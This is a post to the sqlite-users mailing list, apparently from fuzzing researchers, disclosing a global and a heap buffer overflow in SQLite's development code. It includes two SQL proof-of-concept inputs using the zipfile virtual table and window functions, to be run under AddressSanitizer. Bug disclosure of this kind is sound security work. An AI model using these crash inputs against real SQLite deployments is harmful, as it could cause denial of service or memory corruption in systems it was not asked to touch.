Hi, We found a global buffer overflow and a heap buffer overflow in sqlite. Here’s the POC (trigger with asan):
Global buffer overflow: — CREATE TABLE v0 ( v6 INTEGER UNIQUE , v5 , v3 , v4 , v2 , v7 , v1 ) ; INSERT INTO v0 ( v3 ) VALUES ( 0 ) ,( 10 ) ,( 10.100000 ) ,( 10 ) ,( 10 ) ,( 10 ) ,( 10 ) ,( 10 ) ,( 1 ) ,( 'GERMANY' ) ,( 'LG PKG' ) ,( 'SM PKG' ) ,( '%%green%%' ) ,( 'DELIVER IN PERSON' ) ,( 'MED PKG' ) ; SELECT v5 , lag ( v1 , 10.100000 ) OVER( PARTITION BY v1 ORDER BY v5 ) FROM v0 ; ANALYZE v0 ; CREATE VIRTUAL TABLE v8 USING zipfile ( v9 PRIMARY KEY ON CONFLICT REPLACE NOT NULL UNIQUE ON CONFLICT REPLACE ) ; ANALYZE ; REPLACE INTO v8 SELECT * FROM v0 ; SELECT * FROM v0 AS c NATURAL JOIN v0 AS p , v0 NATURAL JOIN v8 NATURAL JOIN v0 ; — Heap buffer overflow: — CREATE TABLE v0 ( v5 INTEGER UNIQUE , v6 , v7 , v2 , v3 , v4 INTEGER UNIQUE ON CONFLICT IGNORE CHECK( 10 ) CHECK( 10 ) , v1 ) ; INSERT INTO v0 ( v4 ) VALUES ( 10 ) ,( 1 ) ,( 10 ) ; SELECT v4 , lag ( v2 , 0.100000 ) OVER( PARTITION BY v4 ORDER BY v6 ) FROM v0 ; ANALYZE v0 ; CREATE VIRTUAL TABLE v8 USING zipfile ( v9 PRIMARY KEY ON CONFLICT REPLACE NOT NULL UNIQUE ) ; ANALYZE ; REPLACE INTO v8 SELECT * FROM v0 ; SELECT * FROM v8 AS c NATURAL JOIN v8 AS p , v0 NATURAL JOIN v8 NATURAL JOIN v8 ; — The bug exists in the latest development code of sqlite. Yongheng & Rui _______________________________________________ sqlite-users mailing list sqlite-users@mailinglists.sqlite.org http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users
